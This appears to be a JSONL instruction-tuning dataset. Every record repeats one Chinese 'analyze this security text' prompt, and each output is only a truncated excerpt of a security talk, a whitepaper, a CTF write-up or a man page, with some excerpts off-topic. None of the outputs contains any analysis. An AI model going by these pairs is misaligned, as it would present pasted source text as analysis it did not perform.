{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n开源生态白皮书 2020 年 中国信息通信研究院 2020年10月 版权声明 本白皮书版权属于中国信息通信研究院并受法律保护 转载摘编或利用其它方式使用本白皮书文字或者观点的 应注明来源中国信息通信研究院违反上述声明者本 院将追究其相关法律责任 前 言 近几年开源技术快速发展在云计算大数据人工智能等领域 逐渐形成技术主流开源技术已经成为企业构建信息系统的重要选择 国内企业参与开源生态的热情度持续提升 本白皮书是中国信息通信研究院在开源领域发布的白皮书分析 国内外开源生态发展现状梳理当前发展热点展望未来发展趋势 白皮书首先介绍了开源生态发展概况重点围绕开源布局开源运营 开源治理开源风险行业开源等开源领域热点话题进行探讨最后 对开源生态未来发展进行了展望 目 录 一 开源生态概述 .................................................. 1 一开源概念逐渐明晰 .......................................... 1 二开源生态以开源项目为中心构建 .............................. 2 二 开源生态发展现状 .............................................. 3 一开源数量持续攀升我国开源覆盖全栈技术领域 ................ 3 二开源占据各领域主要市场份额我国开源应用逐年攀升 .......... 6 三开源企业数量保持稳定增长我国企业呈现主动开源趋势 ....... 12 四开源基金会成为开源运营重要角色 ........................... 15 五各行业开源生态已经形成我国行业积极拥抱开源 ............. 16 六开源风险问题凸显成为开源应用屏障 ....................... 19 七全球开源治理理念兴起我国初步形成开源治理模式 ........... 21 八开源配套政策正在完善我国政策引导开源社区构建 ........... 22 三开源成为企业商业布局的重要手段 ................................. 24 一全球开源商业模式多样化发展 ............................... 24 二全球开源企业已启动收购模式进一步扩大用户群体 ........... 25 三我国开源企业已初步构建形成有影响力的开源项目 ............. 27 四全球开源基金会运营模式成熟我国率先探索联盟运营机制 ........... 30 一良好的开源社区是形成开源代码的前提条件 ................... 30 二开源基金会运营通过知识产权托管培育开源社区 ............... 31 三我国逐步形成稳定的开源运营机制 ........................... 34 五传统行业逐步拥抱开源生态我国行业用户关注开源使用 ............. 35 一工业互联网布局开源看重产业数字化新机遇 ................... 35 二电信行业由用户侧及运营商推动开源探索产品创新 ........... 36 三政府采购行业发展开源看重公开透明 ......................... 38 四金融机构开源看重产业创新力和市场布局 ..................... 39 六开源风险问题复杂开源治理体系正在构建 ......................... 41 一知识产权合规及安全漏洞风险相对普遍 ....................... 41 二开源法律和知识产权环境推动开源良性发展 ................... 44 三开源治理工具加速企业开源治理体系构建 ..................... 45 四开源治理模式逐步落地 ..................................... 46 七开源生态未来发展趋势与建议 ..................................... 47 一开源生态未来发展趋势 ..................................... 47 二我国开源生态发展建议 ..................................... 49 附录一开源软件风险扫描 ............................................ 1 一许可证及合规风险 .......................................... 1 二安全漏洞风险 ..............", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIts all about the timing. . . Haroon Meer and Marco Slaviero {haroon,marco}@sensepost.com SensePost Abstract This paper is broken up into several distinct parts, all related loosely to timing and its role in information se- curity today. While timing has long been recognized as an important component in the crypt-analysts arse- nal, it has not featured very prominently in the domain of Application Security Testing. This paper aims at highlighting some of the areas in which timing can be used with great effect, where traditional avenues fail. In this paper, a brief overview of previous timing attacks is provided, the use of timing as a covert channel is examined and the effectiveness of careful timing during traditional web application and SQL injection attacks is demonstrated. The use of Cross Site Timing in bypass- ing the Same Origin policy is explored as we believe the technique has interesting possibilities for turning innocent browsers into bot-nets aimed at, for instance, brute-force attacks against third party web-sites. 1 Introduction The movement of applications onto the Web has not removed old threats, it has perhaps just coated them a little with the veneer of AJAX and pastel colours. Underneath, the old issues are still present. In this paper, we examine one really ancient class of vulner- abilities, timing attacks, and carry to its logical con- clusion the combination of malicious websites, innocent victims, JavaScript and a healthy dose of timing mea- surements. Occasionally the websites are not malicious and the victims not entirely innocent, but the timing measurements remain throughout. We start with a background on timing attacks in Section 2, and discuss timing as a covert channel in Section 3. Section 4 is lengthy and shows how the mi- gration from regular DNS tunnels to timing channels reduce the bandwidth of output retrieval in SQL injec- tion, but also reduce the requirements placed on the targeted database. In Section 5 we discuss using timing ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"DROP OPERATOR CLASS\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME DROP OPERATOR CLASS \\- 删除一个操作符类 .SH SYNOPSIS .sp .nf DROP OPERATOR CLASS \\fIname\\fR USING \\fIindex_method\\fR [ CASCADE | RESTRICT ] .sp .fi .SH \"DESCRIPTION 描述\" .PP \\fBDROP OPERATOR CLASS\\fR 从数据库中删除一个现有操作符表要执行这条命令你必须是此操作符表的所有者 .SH \"PARAMETERS 参数\" .TP \\fB\\fIname\\fB\\fR 一个现存操作符表的名字可以用模式修饰 .TP \\fB\\fIindex_method\\fB\\fR 操作符表所对付的索引访问方法的名字 .TP \\fBCASCADE\\fR 自动删除依赖于该操作符表的对象 .TP \\fBRESTRICT\\fR 如果有任何依赖对象存在则拒绝删除此操作符表这个行为是缺省 .SH \"EXAMPLES 例子\" .PP 删除 B-tree 操作符表 widget_ops .sp .nf DROP OPERATOR CLASS widget_ops USING btree; .sp .fi 如果有任何现存的索引使用这个操作符表那么这条命令将不能 执行增加一个 CASCADE 删除这样的索引以及这个 操作符表 .SH \"COMPATIBILITY 兼容性\" .PP 在 SQL 标准里没有 DROP OPERATOR CLASS .SH \"SEE ALSO 参见\" ALTER OPERATOR CLASS [\\fBalter_operator_class\\fR(7)], CREATE OPERATOR CLASS [\\fBcreate_operator_class\\fR(l)] .SH \"译者\" .B Postgresql 中文网站 .B 何伟平 <laser@pgsqldb.org>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n深入理解 Windows 字体解析引擎漏洞 wang yu SyScan(+)360, 2012 议题简介 第一部分 议题简介 关于作者 ( wangyu@360.cn ) 议题背景 2011 年 12 月微软月度安全更新修复了此 前曾被Duqu 恶意软件利用的 Win32K 内核漏洞 同月在中国更受关注的一个话题是网站后 台数据库的安全性问题 本议题将聚焦于 Win32K 字体解析引擎的设 计与实现以白盒的视角审视 Duqu 0-day 的利用细 节 议题简介 议题涵盖 - 字体解析引擎客户端接口 ( Font Scaler Client Interface ) 的背景设计与实现 - 演示如何在系统用户态实现字体引擎 ( Font Scaler ) 的客户端  引擎的反内核化示例 - 作为系统内核态字体引擎的客户端Win32K 模块是 如何与之交互的  Win32K 的调用假设 - Duqu 与 MS11-087 远程可执行漏洞 - 字体引擎的更多审计 责任声明 从点阵字体到轮廓字体 第二部分 启动扇区里的小游戏 演示640*480*16 色图形模式写方式二  写点 从点阵字体到轮廓字体 An Improved Representation for Stroke-based Fonts 点阵位图  优点与缺点 从点阵字体到轮廓字体 轮廓字体  优点与缺点 从点阵字体到轮廓字体 我们站在巨人的肩膀之上 数字字体的混沌时期 从复印机到 PostScript 页面描述语言从 Xerox 到 Adobe 苹果公司的加入  LaserWriter1985 年 从操作系统的角度考虑苹果公司从上世纪八十年代末开始 研发自己的可缩放字体技术  Royal这即 TrueType 的 前身 两种流派两种理念 - PostScript Type 1 : cubics; \"smarter\" fonts, \"dumber\" interpreter - TrueType : quadratics; \"dumber\" 字体解析引擎客户端接口 第三部分 引擎起源 PostScript Type 1 vs. Royal ( TrueType ) PostScript 早于后者六年 Royal ( TrueType ) vs. TrueImage \"Apple traded the technology to Microsoft in exchange for the latter 's PostScript clone technology 'TrueImage' ... which was buggy at the time, and never used by Apple\"...  Thomas W. Phinney 内核化后TrueType 字体引擎 ( Font Scaler ) 实现于 Win32K 模块的内部而 Win32K 模块 也可被视为字体引擎的调用者或引擎客户端 引擎的导出接口即 Font Scaler Client Interface 目标研究手段 Duqu 0-day 让我充满好奇 \"Initially, it even caused confusion among researchers who believed Duqu was exploiting a vulnerability in the MS Word format itself\"...  Ivan Teblin 静态逆向 动态跟踪 当然理论上我还可以... 白盒分析 还具备参考价值吗 白盒评估 从宏观角度引擎架构从微观角度代码笔误 sfac_LoadCriticalSfntMetrics  6.2.9200.16384 sfntaccs.c line:953 sfac_DoOffsetTableMap sfntaccs.c line:252 还可以工作吗 I'm Feeling Lucky! 工欲善其事 必先利其器 字体格式分析工具 TTFDump (FontTools) http://www.microsoft.com/typography/tools/tools.aspx 工欲善其事 必先利其器 呃... TTFDump 唯一的问题就是问题太多 工欲善其事 必先利其器 字体调试工具 TrueTypeViewer http://home.kabelfoon.nl/~slam/fonts/truetypeviewer.html 工欲善其事 必先利其器 囧... 好的 引擎的重要接口 Font Scaler Client Interface 表 Font Scaler Client Interface 引擎的重要接口 续表 Font Scaler Client Inter", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOffice Drama ...on macOS WHOIS @patrickwardle analysis exploit chain OUTLINE history Evil Office Docs! defense Recent History macro based attacks, targeting macOS ...defined MACROS Macro: \"A macro is a series of commands & instructions that you group together as a single command to accomplish a task automatically\" -Microsoft Sub AutoOpen() MsgBox \"Hello World!\", 0, \"Title\" End Sub 01 02 03 + MSOffice document + code tl;dr: add code to documents macro code (VBScript) ...of course (ab)used by attackers MACROS + though mitigations... now on macOS? MACROS more macs... malicious & potentially unwanted files for macOS (Kasperksy) more mac malware... macro attack 2017 \"New Attack, Old Tricks\" objective-see.com/blog/blog_0x17.html \"U.S. Allies and Rivals Digest Trumps Victory - Carnegie Endowment for International Peace.docm\" discovery & (limited) detection macro attack 2018 \"Word to Your Mac\" objective-see.com/blog/blog_0x3A.html \"BitcoinMagazine- Quidax_InterviewQuestions_2018.docm\" download & exec 2nd-stage (python) payload sandbox escape! discovery & (limited) detection macro attack 2019 \"Cryptocurrency businesses still being targeted by Lazarus\" securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus \"샘플_기술사업계획서(벤처기업평가용.doc\" is mac? infected document (credit: kaspersky) download & exec 2nd-stage (mach-O) payload Analysis understanding macro based attacks EXTRACTING EMBEDDED MARCOS oletools, ftw $ sudo pip install -U oletools $ olevba -c <path/to/document> $ olevba -c ~/Documents/HelloWorld.docm olevba 0.55.1 on Python 3.7.3 - http://decalage.info/python/oletools ===================================================================== FILE: /Users/patrick/Documents/HelloWorld.docm Type: OpenXML --------------------------------------------------------------------- VBA MACRO ThisDocument.cls in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub AutoOpen() MsgBox \"Hello World!\",", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# IoC容器 --- ## 什么是容器 容器是一种为某种特定组件的运行提供必要支持的一个软件环境例如Tomcat 就是一个 Servlet 容器它可以为 Servlet 的运行提供运行环境类似 Docker 这样的软件也是一个容器它提供了必要的 Linux 环境以便运行一个特定的 Linux 进程 通常来说使用容器运行组件除了提供一个组件运行环境之外容器还提供了许多底层服务例如Servlet 容器底层实现了 TCP 连接解析 HTTP 协议等非常复杂的服务如果没有容器来提供这些服务我们就无法编写像 Servlet 这样代码简单功能强大的组件早期的 JavaEE 服务器提供的 EJB 容器最重要的功能就是通过声明式事务服务使得 EJB 组件的开发人员不必自己编写冗长的事务处理代码所以极大地简化了事务处理 Spring 的核心就是提供了一个 IoC 容器它可以管理所有轻量级的 JavaBean 组件提供的底层服务包括组件的生命周期管理配置和组装服务AOP 支持以及建立在 AOP 基础上的声明式事务服务等", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking WebAssembly Games with Binary Instrumentation WEBASSEMBLY 101 WASM 101 > Developers have done (and continue to do) incredible work speeding up Javascript > However, the dynamic nature of Javascript will always be a roadblock > WebAssembly provides a static, pre-compiled binary format for performance intensive applications WASM 101 > WebAssembly \"defines an instruction set and binary format for an assembly-like architecture\" > WebAssembly is built to be targetable by existing compilers and languages > Finally we can write web applications in C! WASM USES > WebAssembly video games are becoming very common > Look at any browser game website (Newgrounds, Kongregate, etc) > Unity3D and Unreal Engine 4 can now both target WebAssembly > This means theres a lot of targets without a lot of tools WASM USES > WebAssembly is used for a lot of types of applications, not just video games > Retargeted desktop applications > 3D applications > Crypto miners > ...etc > These techniques are not video game specific  video games are just the most fun target WASM REVERSING > With WebAssembly, web RE has started to feel more like traditional binary RE > Back to the disassembler! > A few tools support WebAssembly (mostly static analysis) > radare2 > JEB decompiler > wabt (WebAssemby Binary Toolkit) WASM REVERSING > Browser debugging capabilities for WASM are pretty lacking > No watchpoints > No conditional breakpoints > Lots of bugs VIDEO GAME REVERSING > Video games are a unique challenge when it comes to RE > Video game binaries are typically much larger and more complex than other applications > Video games are more performance intensive, and performance impacts are more noticeable > No one wants to play a game at 5 FPS > With this in mind, I was looking for a tool like Cheat Engine for WASM CHEAT ENGINE > Cheat Engine (made by Dark Byte) is effectively a specialized debugger for hacking video games > Cheat Engine can: > Search memory > Modify and freeze memory > Set watchpoints >", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1  Ofir Arkin, 2000-2005 Ofir Arkin, On the Current State of Remote Active OS Fingerprinting Tools On the Current State of Remote Active OS Fingerprinting Tools Ofir Arkin CTO ofir.arkin@insightix.com Defcon 13 2  Ofir Arkin, 2000-2005 Ofir Arkin, On the Current State of Remote Active OS Fingerprinting Tools What this talk is about?  This talk examines different aspects of remote active operating system fingerprinting  Examines different active OS fingerprinting methods & techniques  Discusses their limitations and advantages  Explains the state of the current used technology  Deals with the question of what can and cannot be accomplished using remote active OS fingerprinting  Looks at what should be done in the future  Analyzes the accuracy aspects of remote active OS fingerprinting and of several active OS fingerprinting tools  Presents the new version of Xprobe2 (Xprobe2 v0.3) 3  Ofir Arkin, 2000-2005 Ofir Arkin, On the Current State of Remote Active OS Fingerprinting Tools Ofir Arkin  CTO and Co-Founder, Insightix http://www.insightix.com  Founder, The Sys-Security Group http://www.sys-security.com  Computer Security Researcher  Infrastructure Discovery  ICMP Usage in Scanning  Xprobe2 (The Active OS Fingerprinting Tool)  VoIP Security  Information Warfare  Member  VoIPSA (Board member, chair security research committee) 4  Ofir Arkin, 2000-2005 Ofir Arkin, On the Current State of Remote Active OS Fingerprinting Tools Remote Active OS Fingerprinting An Introduction 5  Ofir Arkin, 2000-2005 Ofir Arkin, On the Current State of Remote Active OS Fingerprinting Tools An Introduction  Remote Active operating system fingerprinting is the process of actively determining a targeted network nodes underlying operating system by probing the targeted system with several packets and examining the response(s), or lack thereof, received  The traditional approach is to examine the TCP/IP stack behavior (IP, TCP, UDP, and ICMP protocols) of a targeted network element when probed ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Who do I Trust Misc, 100 points ## Description: > Who issued the certificate to tamuctf.com? > (Not in standard gigem{flag} format) ## Solution: We can use `curl` to determine the CN of the certificate issuer. ```console root@kali:/media/sf_CTFs/tamu# curl -vI https://tamuctf.com * Rebuilt URL to: https://tamuctf.com/ * Trying 52.33.57.247... * TCP_NODELAY set * Connected to tamuctf.com (52.33.57.247) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * successfully set certificate verify locations: * CAfile: none CApath: /etc/ssl/certs * (304) (OUT), TLS handshake, Client hello (1): * (304) (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (IN), TLS handshake, Server key exchange (12): * TLSv1.2 (IN), TLS handshake, Server finished (14): * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): * TLSv1.2 (OUT), TLS change cipher, Client hello (1): * TLSv1.2 (OUT), TLS handshake, Finished (20): * TLSv1.2 (IN), TLS handshake, Finished (20): * SSL connection using TLSv1.2 / ECDHE-RSA-CHACHA20-POLY1305 * ALPN, server accepted to use http/1.1 * Server certificate: * subject: CN=tamuctf.com * start date: Feb 4 22:49:02 2019 GMT * expire date: May 5 22:49:02 2019 GMT * subjectAltName: host \"tamuctf.com\" matched cert's \"tamuctf.com\" * issuer: C=US; O=Let's Encrypt; CN=Let's Encrypt Authority X3 * SSL certificate verify ok. ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFast Forensics Using Simple Statistics & Cool Tools WHATS ALL THE FFUSS ABOUT? Do You Hear What I Hear? 7/9/2013 Fast Forensics Using Simple Statistics & Cool Tools 2 Overview  What Can Us Defenders Do?  Malware Effects  What did the malware affect?  Where are all the bad files?  Did it modify the registry? Processes? Services?  File Type & Content Identification  Is this file really a jpeg?  Compressed or encrypted or packed?  Steganalysis  Reversing XOR Encryption  Others  ??? 7/9/2013 Fast Forensics Using Simple Statistics & Cool Tools 3 Overview  Attacker Tools  Executable Packers - Ultimate Packer for eXecutables (UPX)  Base32/64 Encoders  Compressors  7Zip, Winzip, gzip  Encryptors - Axcrypt  Wrappers*  Disguise a file as a bitmap or wave  Steganography Tools  Steg LSB*, Steg Jpg*, many others 7/9/2013 Fast Forensics Using Simple Statistics & Cool Tools 4 *Written by: John Ortiz Overview  Defender Tools  Hex Editors  XVI32 is one free one  there are many  Strings  Extract sequences of characters from a file  Footprint*  Snapshot of files, registry entries, processes, and services  Write Bitmap Histogram (WBH)*  Image and the statistics  Statistical Analyzer*  Autonomous identification 7/9/2013 Fast Forensics Using Simple Statistics & Cool Tools 5 *Written by: John Ortiz TOOL: Wrappers  Wrappers is a small utility to put a bitmap or wave header on any arbitrary file  Essentially disguises a file  it has a valid header  You can see or hear any file  Wrappers.exe -f Solitaire.exe -t bmp -s g  Converts Solitaire.exe into the grayscale image you saw in the intro slide  Well use it for demos 7/9/2013 Fast Forensics Using Simple Statistics & Cool Tools 6 TOOL: Steg LSB  Hides arbitrary data in Least Significant Bit(s) in bitmap images  User can choose number of bits (left: 3 bits/pixel, right: 5 bits/pixel) 7/9/2013 Fast Forensics Using Simple Statistics & Cool Tools 7 TOOL: Steg JPG  Hides arbitrary data in DCT coefficients of jpeg file  Right: original jpg, left: 2", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 janne.lindqvist@tml.hut.fi June 30, .2007 IPv6 is Bad for Your Privacy Janne Lindqvist Helsinki University of Technology (TKK) and International Computer Science Institute (ICSI) 2 janne.lindqvist@tml.hut.fi June 30, .2007 Definition  A covert channel is a mechanism that is not designed for communication, but can nonetheless be abused to allow information to be communicated between parties. 3 janne.lindqvist@tml.hut.fi June 30, .2007 Related Work  S. J. Murdoch and S. Lewis, Embedding covert channels into TCP/IP, in 7th Information Hiding Workshop, June 2005.  K. Ahsan and D. Kundur, Practical Data Hiding in TCP/IP, in Proceedings of the Multimedia and Security Workshop at ACM Multimedia, Dec. 2002.  S. Cabuk, C. E. Brodley, and C. Shields, IP covert timing channels: design and detection, in Proceedings of the 11th ACM conference on Computer and communications security, Oct 2004.  C. Candolin and P. Nikander, IPv6 source addresses considered harmful, in Sixth Nordic Workshop on Secure IT (NordSec), Nov. 2001.  A. Escudero-Pascual, Privacy in the next generation Internet: Data protection in the context of European Union policy, Ph.D. dissertation, Royal Institute of Technology, 2002. 4 janne.lindqvist@tml.hut.fi June 30, .2007 IPv6 Stateless Address Autoconfiguration  Unicast IPv6 address consists of two parts  64 bits for subnet prefix  64 bits for interface identifier  IPv6 Stateless Address Autoconfiguration is used for autoconfiguring addresses without a server  Does not require manual configuration or DHCPv6  Autoconfiguration mechanism to acquire link-local and global IPv6 addresses. 5 janne.lindqvist@tml.hut.fi June 30, .2007 Autoconfiguration and Duplidate Address Detection Procedure  A node chooses a tentative address candidate  The node then performs Duplicate Address Detection  The tentative address is multicasted to the link-local network.  If the address is already in use, the node using the address replies to the message and the first node chooses a d", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCovert Debugging Circumventing Software Armoring Techniques Offensive Computing, LLC Danny Quist Valsmith dquist@offensivecomputing.net valsmith@offensivecomputing.net Offensive Computing - Malware Intelligence Danny Quist  Offensive Computing, Cofounder  PhD Student at New Mexico Tech  Reverse Engineer  Exploit Development  cDc/NSF Offensive Computing - Malware Intelligence Valsmith  Offensive Computing, Cofounder  Malware Analyst/Reverse Engineer  Metasploit Contributor  Penetration Tester/Exploit developer  cDc/NSF Offensive Computing - Malware Intelligence Offensive Computing, LLC  Community Contributions  Free access to malware samples  Largest open malware site on the Internet  350k hits per month  Business Services  Customized malware analysis  Large malware data-mining / access  Reverse Engineering Offensive Computing - Malware Intelligence Introduction  Debugging Malware is a powerful tool  Trace Runtime Performance  Monitor API Calls  Dynamic Analysis == Automation  Malware is getting good at preventing it  Debugger Detection  VM Detection  Legitimate Software Pioneered these Techniques Offensive Computing - Malware Intelligence Overview of Talk  Software Armoring Techniques  Covert Debugging Requirements  Dynamic Instrumentation for Debugging  OS Pagefault Assisted Covert Debugging  Application  Generic Autounpacking  Results Offensive Computing - Malware Intelligence Software Armoring  Packing/Encryption  VM Detection  SEH Tricks  Debugger Detection  Shifting Decode Frame  Example: Microsofts Patchguard Offensive Computing - Malware Intelligence Packing/Encryption  Self-modifying Code  Small Decoder Stub  Decompresses the main executable  Restores imports  Play Tricks with Portable Executables  Hide the Imports  Obscure relocations  Encrypt/compress the executable Offensive Computing - Malware Intelligence Normal PE File Offensive Computing - Malware Intelligence Packed PE File Offensive Computing - Malware Intelligence Virtual Machine Detection  Single ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH FIND 1 \\\" -*- nroff -*- .SH NAME find \\- 递归地在层次目录中处理文件 .SH 总览 SYNOPSIS .B find [path...] [expression] .SH 描述 DESCRIPTION 这个文档是GNU版本 .BR find 命令的使用手册 .B find 搜索目录树上的每一个文件名它从左至右运算给定的表达式按照优先规则(见运 算符OPERATORS一节)进行匹配直到得出结果左边运算在 '与' 操作中得出假 在'或' 操作中得出真然后 .B find 移向下一个文件名 .PP 第一个以 '\\-' , '(' , ')' , ',' 或 '!' 这些字符起始的参数是表达式的开始; 在它之前的任何参数是要搜索的路径在它之后的任何参数都是表达式的余下部分 如果没有路径参数缺省用当前目录如果没有表达式缺省表达式 用 '\\-print'. .PP 当所有文件都成功处理时 .B find 退出并返回状态值0如果发生错误则返回一个大于0的值 .SH 表达式 EXPRESSIONS .P 表达式是由\\fB选项\\fR(选项总是影响所有的操作, 而不仅仅是一个指定的文件的处 理, 而且总是返回真值)\\fB测试\\fR(测试返回一个真值或一个假值)还有\\fB动 作\\fR(动作有side effects, 返回一个真值或假值) 组成它们都以运算符分开.忽 略运算符的时候默认使用 \\-and 连接. 如果表达式没有包含 \\-prune 以外的动 作当表达式为真时会执行 \\-print 动作 .SS 选项 OPTIONS .P 所有的选项都总是返回真值它们总会被执行除非放在表达式中执行不到的地方 因此清楚起见最好把它们放在表达式的开头部分 .IP \\-daystart 从当日起始时开始而不是从24小时之前计算时间(for \\-amin, \\-atime, \\-cmin, \\-ctime, \\-mmin, and \\-mtime) .IP \\-depth 先处理目录的内容再处理目录本身 .IP \\-follow 不检索符号链接隐含了 \\-noleaf .IP \"\\-help, \\-\\-help\" 列出 .B find 的命令行用法的概要然后退出 .IP \"\\-maxdepth \\fIlevels\\fR\" 进入命令行参数指定的目录下层目录时最深不超过\\fIlevels\\fR(一个非负整数) 层`\\-maxdepth 0' 意味着只在命令行参数指定的目录中执行测试和动作 .IP \"\\-mindepth \\fIlevels\\fR\" 不在\\fIlevels\\fR(一个非负整数)层之内执行任何测试和动作`\\-mindepth 1'意 味着处理所有的文件除了命令行参数指定的目录中的文件 .IP \\-mount 不进入处于其它文件系统之上的目录可以用\\-xdev代替从而和一些其他版本的 .BR find 兼容 .IP \"\\-noleaf\" 不为\\(lq目录中子目录数量比硬连接数少2\\(rq这种假设做优化这个选项在搜索那些不遵 循UNIX文件系统链接约定的文件系统时用比如CD-ROM,MS-DOS文件系统或AFS卷的 加载点在普通的UNIX文件系统中,每个目录至少有两个硬连接,它的名字和它 的 '.' 条目另外它的子目录(假如有)还会各有一个 '..' 链接到它在 .B find 检索一个目录时发现子目录数比它的连接数少二时它就知道目录中的其他条目 并非目录(而是目录树中的叶(`leaf')节点)除非需要检索的是这个叶节点否则 没必要去处理它这样可以带来很大的搜索速度提升 .IP \"\\-version, \\-\\-version\" 打印\\fBfind\\fR的版本号然后退出 .IP \\-xdev 不进入处于其他文件系统之上的目录 .SS 测试 TESTS .P 数字参数可以这样给出 .IP \\fI+n\\fP 是比 .IR n 大 .IP \\fI\\-n\\fP 是比 .IR n 小 .IP \\fIn\\fP 正好是 .IR n  .IP \"\\-amin \\fIn\\fR\" 对文件的最近一次访问是在 \\fIn\\fR 分钟之前 .IP \"\\-anewer \\fIfile\\fR\" 对文件的最近一次访问比 \\fIfile\\fR 修改时间要晚如果命令行中 \\-follow 在 \\-anewer 之前(也只有在这种情况下) \\-anewer 会受 \\-follow 的影响 .IP \"\\-atime \\fIn\\fR\" 对文件的最近一次访问是在 \\fIn\\fR*24 小时之前 .IP \"\\-cmin \\fIn\\fR\" 对文件状态的最近一次修改是在 \\fIn\\fR 分钟之前 .IP \"\\-cnewer \\fIfile\\fR\" 对文件状态的最", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n以攻促防  企业红蓝对抗体系建设 关于我 胡珀 / lake2 腾讯 - 技术工程事业群TEG- 安全平台部 应用运维安全总监基础安全负责人资深专家工程师 腾讯安全应急响应中心TSRC Tencent Blade Team 安全研究团队 腾讯蓝军及倚天蓝军自动化平台 主导 逾十五年网络安全经验 2007年加入腾讯一直从事基础安全相关工作 安全组织80SEC/蓝星群/企业蓝军联盟COS成员 企业安全体系建设思路 - SDL  安全技术培训  安全意识培训  安全规范  安全技术培训  安全意识培训  安全规范  代码审计  渗透测试  应急响应执行  人工巡查  漏洞扫描系统  安全情报系统  安全需求建立  质量标准建立  风险识别  提供安全开发工具  安全开发模范和最 佳实践  安全API  应急响应方案  上线前集成环境安 全检查  安全运维规范 培训/training 设计/design 验证/verification 响应/response 要求/requirements 实施/implementation 发布/release Security Development Lifecycle 企业安全体系建设思路 - DevSecOps 一个问题 建立了安全团队 建设了各类安全规范安全系统 安全流程 那么现在足够安全 了吗 如何验证安全体系是否有效 实战是检验安全防护能力的唯一标准 Talk is CheapShow me the Shell Red Team蓝军与红蓝对抗的概念 理念来自军事演习 Red Team 红队/蓝军 攻击方 发起网络攻击验证 Blue Team 蓝队 防守方 负责网络攻击防守 Purple Team 紫队 协调方 检验攻防双方效果 渗透测试与红蓝对抗 红蓝对抗是传统的渗透测试的升级版 腾讯蓝军体系建设实践 自2006年渗透测试开始 从单一Web漏洞挖掘到整体安全体系验证 覆盖APT攻击DDoSAIoT风控安全办 公室窃听等场景 衍生出专门的战略支援团队及平台 引入外部白帽子及众测 为腾讯云大客户提供服务 系统安全蓝军黑客攻防 传统的系统漏 洞挖掘及模拟 APT攻击 网络安全蓝军DDoS攻防 模拟各类资源消耗型流量阻塞型的DDoS攻击检验DDoS防护体系 业务安全蓝军风控攻防 模拟各类黑产检验业务安全防护体系 物理安全蓝军窃听风云 模拟会议室窃听近源渗透等场景检验物理安全防护体系 泛蓝军 - SRC与众测 以众多第三方的独立视角帮助发现实际安全风险 泛蓝军  支援部队 战略支援部队工具平台研发安全技术研究支持 红蓝对抗实战案例一 2010年一次红蓝对抗模拟黑客进行渗透挖掘漏洞同时检验HIDS的入侵检测能力 红蓝对抗实战案例二 2018年一次红蓝对抗启动无人机挂载无线电发射器飞到智能楼宇36层进行近源渗透 展示智能楼宇的安全风险 HITB 2018HACKING INTELLIGENT BUILDING 蓝军经验沉淀  倚天蓝军平台建设 将个人能力和经验沉淀为平台策略尽量自动化实现红蓝对抗检验 测试版已发现外部35个企业70个严重漏洞均已通过对应SRC提交 各蓝军团队的分工与协作  腾讯经验 开源协同解决跨团队的多支蓝军的竞争与合作 内部开源底层技术平台共建 协同作战子领域各自分任之 红蓝对抗Oteam 尝试为行业做一些微小贡献 企业蓝军联盟COSCyber Offensive Security由 avfisher 发起的闭门会 旨在 促进行业内蓝军团队技术交流 促进行业内蓝军团队互助与合作 推动行业内企业蓝军体系建设 制定行业蓝军技术标准 (?) 总结 关注安全风险更要关注安全防御体系的缺陷 不止是渗透红蓝对抗领域应该是全方位的 不要依赖单兵作战红蓝对抗能力需要沉淀为自动化平台 在HW推动下红蓝对抗将飞速发展不论是技术还是商业化 关注法律风险一切行动都需要在合法合规条件下进行 谢谢观看 虽是陌路亦可相识", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLocking Down Apache Locking Down Apache Jay Beale Senior Security Consultant, Intelguardians jay@bastille-linux.org (Def Con 12) Contents Configuration Modification Chroot-ing Apache Removing Modules Using Security-focused Apache Modules httpd.conf We harden recent releases of Apache entirely through the httpd.conf file. /etc/apache/httpd.conf (Solaris) /etc/httpd/conf/httpd.conf (Linux, recent) /usr/local/apache/etc/httpd.conf (compiled w/ --prefix=/usr/local/apache) Lets look at this files structure. Apache Configuration File Apaches configuration file starts with a number of generic options and then begins to set options based on parts of the webspace in <Directory> blocks. <Directory /> Order Allow, Deny Deny from All </Directory> Apache Config file The Apache configuration file has three parts. The first part applies to the entire server as a whole, virtual servers and all. ### Section 1: Global Environment ServerRoot \"/usr/local/apache\" #Listen 12.34.56.78:80 Listen 80 LoadModule access_module 